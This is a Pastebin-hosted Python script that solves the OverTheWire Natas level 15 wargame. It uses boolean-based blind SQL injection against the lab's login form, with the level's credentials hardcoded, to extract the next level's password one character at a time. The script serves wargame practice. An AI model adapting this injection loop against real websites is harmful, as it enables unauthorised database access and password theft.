Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #! python3
- #########################
- # ASCII TABLE
- # '0' -> 48, '9' -> 57
- # 'A' -> 65, 'Z' -> 90
- # 'a' -> 97, 'z' -> 122
- #########################
- #############################
- # Imports
- import os
- import sys
- import requests
- import re
- #############################
- # Global Variables
- bruteforced_password=""
- password_length=32
- current_password_character_index=1
- password_character_iterate=''
- # 1 -> 0 to 9, 2 -> A to Z, 3 -> a to z
- current_range=1
- # Result Strings
- result_string_true="This user exists."
- result_string_false="This user doesn't exist."
- result_string_error="Error in query."
- http_session=""
- http_sql_injection_username_parameter_string=""
- http_request=""
- http_response=""
- #############################
- # Functions
- # Function to set http string
- def set_http_string ( mode, character ):
- global http_sql_injection_username_parameter_string
- # Mode 1 -> Equal, Mode 2 -> More or Equal, Mode 3 -> Less or Equal
- if ( mode == 1):
- http_sql_injection_username_parameter_string='natas16\" and ascii(substring((SELECT password from users where username=\"natas16\"),' + str(current_password_character_index) + ',1))=' + str(ord(character)) + ' and password like \"%'
- elif ( mode == 2):
- http_sql_injection_username_parameter_string='natas16\" and ascii(substring((SELECT password from users where username=\"natas16\"),' + str(current_password_character_index) + ',1))>=' + str(ord(character)) + ' and password like \"%'
- else:
- http_sql_injection_username_parameter_string='natas16\" and ascii(substring((SELECT password from users where username=\"natas16\"),' + str(current_password_character_index) + ',1))<=' + str(ord(character)) + ' and password like \"%'
- return
- # Function to Get Range
- # Return 1 for 0-9, 2 for A-Z, 3 for a-z, 4 for error
- def Get_Range ():
- global http_sql_injection_username_parameter_string
- global http_request
- global http_response
- # Get the range, through less than or equals#
- # Check if character is within 0-9
- set_http_string(3, '9')
- http_request = http_session.post('http://natas15.natas.labs.overthewire.org/index.php', data = {'username' : http_sql_injection_username_parameter_string})
- http_response = str(http_request.text)
- # If it is within 0-9
- if re.search(result_string_true ,http_response):
- return 1
- elif re.search(result_string_error,http_response):
- return 4
- # Check if character is within A-Z
- set_http_string(3, 'Z')
- http_request = http_session.post('http://natas15.natas.labs.overthewire.org/index.php', data = {'username' : http_sql_injection_username_parameter_string})
- http_response = str(http_request.text)
- # If it is within A-Z
- if re.search(result_string_true ,http_response):
- return 2
- elif re.search(result_string_error,http_response):
- return 4
- # Check if character is within a-z
- set_http_string(3, 'z')
- http_request = http_session.post('http://natas15.natas.labs.overthewire.org/index.php', data = {'username' : http_sql_injection_username_parameter_string})
- http_response = str(http_request.text)
- # If it is within a-z
- if re.search(result_string_true ,http_response):
- return 3
- elif re.search(result_string_error,http_response):
- return 4
- return 0
- # Function to Brute Force Password
- def BruteForcePassword ( BruteForcePassword_password_range ):
- BruteForcePassword_Password_Character=''
- # Range is 0-9
- if BruteForcePassword_password_range==1:
- for code in range(ord('0'), ord('9') + 1):
- if Check_HTTP_Character(chr(code))==0:
- BruteForcePassword_Password_Character = chr(code)
- # Range is A-Z
- elif BruteForcePassword_password_range==2:
- for code in range(ord('A'), ord('Z') + 1):
- if Check_HTTP_Character(chr(code))==0:
- BruteForcePassword_Password_Character = chr(code)
- # Range is a-z
- elif BruteForcePassword_password_range==3:
- for code in range(ord('a'), ord('z') + 1):
- if Check_HTTP_Character(chr(code))==0:
- BruteForcePassword_Password_Character = chr(code)
- return BruteForcePassword_Password_Character
- # Function to Check HTTP Character
- # [Returns] 0 -> Correct Character, 1 -> False Character, 2 -> Error in SQL Query
- def Check_HTTP_Character ( Check_HTTP_Character_character ):
- global http_sql_injection_username_parameter_string
- global http_request
- global http_response
- set_http_string(1, Check_HTTP_Character_character)
- http_request = http_session.post('http://natas15.natas.labs.overthewire.org/index.php', data = {'username' : http_sql_injection_username_parameter_string})
- http_response = str(http_request.text)
- if re.search(result_string_true,http_response):
- return 0
- elif re.search(result_string_false ,http_response):
- return 1
- else:
- print ('Error in SQL Query...')
- exit()
- ###############################
- # Main Function
- http_session = requests.Session()
- http_session.auth=('natas15','AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
- while (current_password_character_index<=32):
- # Call Get Range Function, 0 -> This shouldnt be returned, 1 -> 0-9, 2 -> A-Z, 3 -> a-z, 4-> error in sql query
- current_range = Get_Range()
- # Error Code 0
- if current_range==0:
- print ('Program should not return this...')
- break
- # Range is 0-9 or Range is A-Z or Range is a-z
- elif current_range==1 or current_range==2 or current_range==3:
- Password_Character = BruteForcePassword(current_range)
- bruteforced_password=bruteforced_password+Password_Character
- # Error in SQL Query
- elif current_range==4:
- print ('Error in SQL Query')
- break
- print ('Loop Count: ' + str(current_password_character_index))
- print ('Current Brute Forced Password: ' + bruteforced_password)
- current_password_character_index+=1
- print ('Password for natas16 is ' + bruteforced_password)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement